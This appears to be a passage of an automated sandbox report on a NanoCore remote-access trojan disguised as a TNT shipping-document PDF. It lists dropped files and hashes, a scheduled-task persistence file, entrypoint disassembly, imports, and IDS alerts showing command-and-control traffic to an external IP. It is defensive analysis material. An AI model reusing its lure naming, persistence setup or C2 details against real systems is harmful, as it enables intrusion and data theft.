                                                      Entropy (8bit):6.1750840449797675
                                                      Encrypted:false
                                                      SSDEEP:3072:Mao0QHGUQWWimj9q/NLpj/WWqvAw2XpFU4rwOe4ubZSif02RFi/x2uv9FeP:boZTTWxxqVpqWVRXfr802biprVu
                                                      MD5:D621FD77BD585874F9686D3A76462EF1
                                                      SHA1:ABCAE05EE61EE6292003AABD8C80583FA49EDDA2
                                                      SHA-256:2CA7CF7146FB8209CF3C6CECB1C5AA154C61E046DC07AFA05E8158F2C0DDE2F6
                                                      SHA-512:2D85A81D708ECC8AF9A1273143C94DA84E632F1E595E22F54B867225105A1D0A44F918F0FAE6F1EB15ECF69D75B6F4616699776A16A2AA8B5282100FD15CA74C
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: New Order_PO#060317_007_Pdf________________________________________.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: jCLiY7TCmD.exe, Detection: malicious, Browse
                                                      • Filename: WkyJ4e1mGH.exe, Detection: malicious, Browse
                                                      • Filename: Enquiry No ANS700_Pdf___.exe, Detection: malicious, Browse
                                                      • Filename: Enquiry No ANS700_Pdf___.exe, Detection: malicious, Browse
                                                      • Filename: P.I - AE-SA-10016 - SIG SHARBTLY INTERNATIONAL GROUP.exe, Detection: malicious, Browse
                                                      • Filename: Purchase Order 40,7045.exe, Detection: malicious, Browse
                                                      • Filename: PAYMENT ADVICE.exe, Detection: malicious, Browse
                                                      • Filename: Swift Copy.exe, Detection: malicious, Browse
                                                      • Filename: Quotation Request-RFQ#2020-11-19.exe, Detection: malicious, Browse
                                                      • Filename: Api Details.exe, Detection: malicious, Browse
                                                      • Filename: BALANCE PAYMENT.exe, Detection: malicious, Browse
                                                      • Filename: 5dj4XCE86M.exe, Detection: malicious, Browse
                                                      • Filename: z865yM9Ehy.exe, Detection: malicious, Browse
                                                      • Filename: EXPORT SHIPMENT CERTIFIED 2.exe, Detection: malicious, Browse
                                                      • Filename: 4IZjnTicql.exe, Detection: malicious, Browse
                                                      • Filename: K1Rul7dwGf.exe, Detection: malicious, Browse
                                                      • Filename: 14RP4w9CuA.exe, Detection: malicious, Browse
                                                      • Filename: Bx757nPqML.exe, Detection: malicious, Browse
                                                      Reputation:moderate, very likely benign file
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z.........."...0..|...B......n.... ........@.. ....................................`.....................................O........>..............`>.......................................................... ............... ..H............text....z... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B................P.......H.......8)...................|.........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):841
                                                      Entropy (8bit):5.356220854328477
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoIvEE4xDqE4j:MxHKXwYHKhQnoPtHoxHwvEHxDqHj
                                                      MD5:486580834B084C92AE1F3866166C9C34
                                                      SHA1:C8EB7E1CEF55A6C9EB931487E9AA4A2098AACEDF
                                                      SHA-256:65C5B1213E371D449E2A239557A5F250FEA1D3473A1B5C4C5FF7492085F663FB
                                                      SHA-512:2C54B638A52AA87F47CAB50859EFF98F07DA02993A596686B5617BA99E73ABFCD104F0F33209E24AFB32E66B4B8A225D4DB2CC79631540C21E7E8C4573DFD457
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..2,"Microsoft.Build.Framework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
                                                      Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1037
                                                      Entropy (8bit):5.371216502395632
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7KvEE4xDqE4j:MxHKXwYHKhQnoPtHoxHhAHKzvKvEHxD0
                                                      MD5:C7F28B87C2CAD111D929CB9A0FF822F8
                                                      SHA1:C2CF9E7A3F6EFD9000FE76EBE54E4E9AE5754267
                                                      SHA-256:D1B02C20EACF464229AB063FA947A525E2ED7772259A8F70C7205DC13599EAE6
                                                      SHA-512:E0F35874E02AB672CFF0553A0DA0864DAB14C05733D06395E4D0C9CDFC6F445E940310F8D01E3E1B28895F636DFBC1F510E103D1C46818400BA4E7371D8F254D
                                                      Malicious:false
                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.Build.Framework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build, Version=4.0.0.0, Culture=neutral,
                                                      C:\Users\user\AppData\Local\Temp\tmp731A.tmp
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1320
                                                      Entropy (8bit):5.137611098420233
                                                      Encrypted:false
                                                      SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0moxtn:cbk4oL600QydbQxIYODOLedq3Zoj
                                                      MD5:3E2B26ED8B75AE83A269595180E84EF6
                                                      SHA1:D30A0335FCCE406BCA8BA5764288235E6192F608
                                                      SHA-256:108BE30AEB8EB31C185A39A6726F26DACBC4E4124951C61A29ADE4B7038C71EA
                                                      SHA-512:B6981C68FCB886CC8379A068B96931B9D4F5CC5AA9BDC467E36C4168FE6C5273A2A84D8850B12C11703EC03AC6B1F1950D1E669EFCB59FC2402CE4BBA9DC03D3
                                                      Malicious:true
                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                      C:\Users\user\AppData\Local\Temp\tmp7609.tmp
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1310
                                                      Entropy (8bit):5.109425792877704
                                                      Encrypted:false
                                                      SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                                      MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                                      SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                                      SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                                      SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                                      Malicious:false
                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                      C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1624
                                                      Entropy (8bit):7.024371743172393
                                                      Encrypted:false
                                                      SSDEEP:48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrw8:flC0IlC0IlC0IlC0IlC0IlC0IlC08
                                                      MD5:0D79388CEC6619D612C2088173BB6741
                                                      SHA1:8A312E3198009C545D0CF3254572189D29A03EA7
                                                      SHA-256:D7D423B23D932E306F3CCB2F7A984B7036A042C007A43FD655C6B57B960BB8DF
                                                      SHA-512:53BB3E9263DFD746E7E8159466E220E6EC9D81E9D3F0E1D191E09CD511B7EB93B0BA65D13CE0C97C652ECD0F69BB991E6B1840F961BC65003C4DD7AA93EEDA13
                                                      Malicious:false
                                                      Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
                                                      C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8
                                                      Entropy (8bit):3.0
                                                      Encrypted:false
                                                      SSDEEP:3:6VQ:6e
                                                      MD5:80AF87D7D4711FE01B9BD93DEA99B562
                                                      SHA1:85CA7BA9B80AEB0AF92FD9B3B394B1D86FE4C76C
                                                      SHA-256:BD368AEEC8818B4106F481C92B7D242B079FAA718AD109E6D8779F613D1AB6FB
                                                      SHA-512:5C55593F43C186EF0992AB60935877EA13EFD11310B98915414E50E2A5955B6ADEE4A79940C46C5CE838D2592BD1524728FB071C062A20BAA3208D8B479E6501
                                                      Malicious:true
                                                      Preview: ...8...H
                                                      C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):57
                                                      Entropy (8bit):4.887726803973036
                                                      Encrypted:false
                                                      SSDEEP:3:oMty8WddSJ8:oMLW6C
                                                      MD5:6ECAFC0490DAB08E4A288E0042B6B613
                                                      SHA1:4A4529907588505FC65CC9933980CFE6E576B3D6
                                                      SHA-256:DC5F76FBF44B3E6CDDC14EA9E5BB9B6BD3A955197FE13F33F7DDA7ECC08E79E0
                                                      SHA-512:7DA2B02627A36C8199814C250A1FBD61A9C18E098F8D691C11D75044E7F51DBD52C31EC2E1EA8CDEE5077ADCCB8CD247266F191292DB661FE7EA1B613FC646F8
                                                      Malicious:false
                                                      Preview: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      \Device\ConDrv
                                                      Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):298
                                                      Entropy (8bit):4.943030742860529
                                                      Encrypted:false
                                                      SSDEEP:6:zx3M1tFAbQtU1R30qyMstwYVoRRZBXVN+J0fFdCsq2UTiMdH8stCal+n:zK13I30ZMt9BFN+QdCT2UftCM+
                                                      MD5:6A9888952541A41F033EB114C24DC902
                                                      SHA1:41903D7C8F31013C44572E09D97B9AAFBBCE77E6
                                                      SHA-256:41A61D0084CD7884BEA1DF02ED9213CB8C83F4034F5C8156FC5B06D6A3E133CE
                                                      SHA-512:E6AC898E67B4052375FDDFE9894B26D504A7827917BF3E02772CFF45C3FA7CC5E0EFFDC701D208E0DB89F05E42F195B1EC890F316BEE5CB8239AB45444DAA65E
                                                      Malicious:false
                                                      Preview: Microsoft (R) Build Engine version 4.7.3056.0..[Microsoft .NET Framework, version 4.0.30319.42000]..Copyright (C) Microsoft Corporation. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                      Entropy (8bit):6.925960933213739
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE
                                                      File size:542720
                                                      MD5:d40d97b41a353bc42b0e7ebe451886d9
                                                      SHA1:8e416c76489782a32eade1b03bcd26dce3f19a82
                                                      SHA256:23b46a12d6b6a703b8e588d24f3c0018cf749556b021b514b963587e7adaa25b
                                                      SHA512:85d6c292351f8ff836337c9ace1c38e3f65cb15268d160c9f5e5f8f52ee7284834fa1c4a022bc58204664cf35ea348b802ff01d3f0d2b64b56b6bd4eb963c65d
                                                      SSDEEP:6144:qJa6HhHoWXBuRPh6DnN+2gUFKLpGbNLpvlKK01gBxF8uUzeSg2ZDqnB8lRBYc:YlZYRsLN4cKLpGbNTjDF8u8JvKBkTj
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......JH.*.).y.).y.).y..qy.).y..yy/).y..{y.).y..xy.).y.).yr).y.^.y.).y).xy.).y)..y.).y).zy.).yRich.).y................PE..L...tt.`...

                                                      File Icon

                                                      Icon Hash:70cccecececcec30

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x404ad0
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows cui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x60097474 [Thu Jan 21 12:32:52 2021 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:6
                                                      OS Version Minor:0
                                                      File Version Major:6
                                                      File Version Minor:0
                                                      Subsystem Version Major:6
                                                      Subsystem Version Minor:0
                                                      Import Hash:50cdb1b392e09bc322ca35e8f4935cd6

                                                      Entrypoint Preview

                                                      Instruction
                                                      call 00007FF2448D2107h
                                                      jmp 00007FF2448CA056h
                                                      and dword ptr [00420D24h], 00000000h
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push ecx
                                                      and dword ptr [ebp-04h], 00000000h
                                                      push 0041A29Ch
                                                      push 0041A2B0h
                                                      call dword ptr [0041A100h]
                                                      push eax
                                                      call dword ptr [0041A0D4h]
                                                      test eax, eax
                                                      je 00007FF2448CA224h
                                                      push 00000000h
                                                      lea ecx, dword ptr [ebp-04h]
                                                      push ecx
                                                      call eax
                                                      cmp eax, 7Ah
                                                      jne 00007FF2448CA217h
                                                      xor eax, eax
                                                      inc eax
                                                      leave
                                                      ret
                                                      xor eax, eax
                                                      leave
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push dword ptr [ebp+08h]
                                                      call dword ptr [0041A0E4h]
                                                      pop ebp
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push dword ptr [ebp+08h]
                                                      call dword ptr [0041A0F0h]
                                                      pop ebp
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push dword ptr [ebp+08h]
                                                      call dword ptr [0041A0E8h]
                                                      pop ebp
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push dword ptr [ebp+0Ch]
                                                      push dword ptr [ebp+08h]
                                                      call dword ptr [0041A0ECh]
                                                      pop ebp
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      sub esp, 44h
                                                      lea eax, dword ptr [ebp-44h]
                                                      push eax
                                                      call dword ptr [0041A0FCh]
                                                      test byte ptr [ebp-18h], 00000001h
                                                      je 00007FF2448CA218h
                                                      movzx eax, word ptr [ebp-14h]
                                                      leave
                                                      ret
                                                      push 0000000Ah
                                                      pop eax
                                                      leave
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push ecx
                                                      push esi
                                                      mov esi, dword ptr [0041F368h]
                                                      test esi, esi
                                                      jns 00007FF2448CA245h
                                                      push 0041A29Ch
                                                      xor esi, esi
                                                      push 0041A2B0h
                                                      mov dword ptr [ebp-04h], esi
                                                      call dword ptr [00000000h]

                                                      Rich Headers

                                                      Programming Language:
                                                      • [LNK] VS2012 build 50727
                                                      • [RES] VS2012 build 50727
                                                      • [ C ] VS2012 build 50727

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1d5640xb4.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x327d8.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x550000xfdc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1cd180x40.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x1a0000x210.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x189940x18a00False0.526233343909data6.49084256108IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rdata0x1a0000x418e0x4200False0.352095170455data4.70513234879IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x1f0000x2d600x1000False0.206787109375data2.47644845022IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x220000x327d80x32800False0.384548073948data5.23228179627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x550000x123c0x1400False0.6751953125data5.88808398568IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x222800x8f02PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedChineseTaiwan
                                                      RT_ICON0x2b1880x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0ChineseTaiwan
                                                      RT_ICON0x3b9b00x94a8dataChineseTaiwan
                                                      RT_ICON0x44e580x5488dataChineseTaiwan
                                                      RT_ICON0x4a2e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 15794175, next used block 4294909696ChineseTaiwan
                                                      RT_ICON0x4e5080x25a8dataChineseTaiwan
                                                      RT_ICON0x50ab00x10a8dataChineseTaiwan
                                                      RT_ICON0x51b580x988dataChineseTaiwan
                                                      RT_ICON0x524e00x468GLS_BINARY_LSB_FIRSTChineseTaiwan
                                                      RT_RCDATA0x529d00x1e05dataChineseTaiwan
                                                      RT_GROUP_ICON0x529480x84dataChineseTaiwan

                                                      Imports

                                                      DLLImport
                                                      KERNEL32.dllGetDiskFreeSpaceExA, ReleaseSemaphore, SearchPathW, GlobalGetAtomNameW, GetTickCount, TerminateJobObject, GetProcessHeap, LoadLibraryA, GetConsoleWindow, ReadConsoleInputA, PeekConsoleInputA, HeapAlloc, MoveFileExA, GetNumberOfConsoleInputEvents, SetEndOfFile, SetEnvironmentVariableA, CreateFileW, GetFileAttributesExW, CreateProcessA, GetExitCodeProcess, WaitForSingleObject, GetStringTypeW, EnumSystemLocalesEx, IsValidLocaleName, LCMapStringEx, GetUserDefaultLocaleName, GetLocaleInfoEx, CompareStringEx, GetDateFormatEx, GetTimeFormatEx, HeapSize, LoadLibraryW, OutputDebugStringW, WriteConsoleW, SetFilePointerEx, SetStdHandle, HeapReAlloc, FreeEnvironmentStringsW, GetEnvironmentStringsW, IsDebuggerPresent, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, GetLastError, AreFileApisANSI, MultiByteToWideChar, EncodePointer, DecodePointer, InterlockedDecrement, ExitProcess, GetModuleHandleExW, GetProcAddress, GetCommandLineA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, GetCurrentProcess, TerminateProcess, GetStartupInfoW, GetModuleHandleW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, FatalAppExitA, HeapFree, Sleep, CloseHandle, FlushFileBuffers, GetStdHandle, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetFileType, InitOnceExecuteOnce, RtlUnwind, ReadFile, ReadConsoleW, SetFilePointer, DeleteFileW, MoveFileExW, GetModuleFileNameW, InterlockedExchange, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, InterlockedIncrement, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, GetCurrentThread, GetCurrentThreadId, GetModuleFileNameA, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetTickCount64, SetConsoleMode
                                                      wsnmp32.dll
                                                      CRYPT32.dllCertGetEnhancedKeyUsage
                                                      ole32.dllCreateAntiMoniker, OleSetAutoConvert, StringFromIID, HMETAFILE_UserUnmarshal, OleRegGetMiscStatus, RegisterDragDrop, CreateStreamOnHGlobal
                                                      SHELL32.dllShellExecuteA, FindExecutableA, SHGetFileInfo
                                                      pdh.dllPdhOpenLogW, PdhBrowseCountersW
                                                      WINMM.dllwaveOutBreakLoop, midiInPrepareHeader, mmioGetInfo, joyGetPosEx, mixerMessage, waveInUnprepareHeader, mmioAdvance, mmioRenameA
                                                      USER32.dllShowWindow

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      ChineseTaiwan

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      01/22/21-07:30:35.963522TCP2025019ET TROJAN Possible NanoCore C2 60B497375090192.168.2.491.193.75.155
                                                      01/22/21-07:30:43.444799TCP2025019ET TROJAN Possible NanoCore C2 60B497385090192.168.2.491.193.75.155
                                                      01/22/21-07:30:51.244977TCP2025019ET TROJAN Possible NanoCore C2 60B497415090192.168.2.491.193.75.155
                                                      01/22/21-07:30:58.286261TCP2025019ET TROJAN Possible NanoCore C2 60B497435090192.168.2.491.193.75.155
                                                      01/22/21-07:31:05.172412TCP2025019ET TROJAN Possible NanoCore C2 60B497445090192.168.2.491.193.75.155
                                                      01/22/21-07:31:12.170639TCP2025019ET TROJAN Possible NanoCore C2 60B497525090192.168.2.491.193.75.155
                                                      01/22/21-07:31:19.876213TCP2025019ET TROJAN Possible NanoCore C2 60B497585090192.168.2.491.193.75.155
                                                      01/22/21-07:31:26.508386TCP2025019ET TROJAN Possible NanoCore C2 60B497625090192.168.2.491.193.75.155
                                                      01/22/21-07:31:32.711233TCP2025019ET TROJAN Possible NanoCore C2 60B497685090192.168.2.491.193.75.155
                                                      01/22/21-07:31:38.673936TCP2025019ET TROJAN Possible NanoCore C2 60B497695090192.168.2.491.193.75.155
                                                      01/22/21-07:31:45.771730TCP2025019ET TROJAN Possible NanoCore C2 60B497705090192.168.2.491.193.75.155
                                                      01/22/21-07:31:51.904335TCP2025019ET TROJAN Possible NanoCore C2 60B497715090192.168.2.491.193.75.155
                                                      01/22/21-07:31:59.176544TCP2025019ET TROJAN Possible NanoCore C2 60B497725090192.168.2.491.193.75.155
                                                      01/22/21-07:32:05.936635TCP2025019ET TROJAN Possible NanoCore C2 60B497755090192.168.2.491.193.75.155
                                                      01/22/21-07:32:13.035831TCP2025019ET TROJAN Possible NanoCore C2 60B497765090192.168.2.491.193.75.155
                                                      01/22/21-07:32:19.932310TCP2025019ET TROJAN Possible NanoCore C2 60B497775090192.168.2.491.193.75.155
                                                      01/22/21-07:32:26.960210TCP2025019ET TROJAN Possible NanoCore C2 60B497785090192.168.2.491.193.75.155
                                                      01/22/21-07:32:33.984764TCP2025019ET TROJAN Possible NanoCore C2 60B497795090192.168.2.491.193.75.155
                                                      01/22/21-07:32:41.028507TCP2025019ET TROJAN Possible NanoCore C2 60B497805090192.168.2.491.193.75.155
                                                      01/22/21-07:32:48.367382TCP2025019ET TROJAN Possible NanoCore C2 60B497815090192.168.2.491.193.75.155
                                                      01/22/21-07:32:55.282856TCP2025019ET TROJAN Possible NanoCore C2 60B497825090192.168.2.491.193.75.155
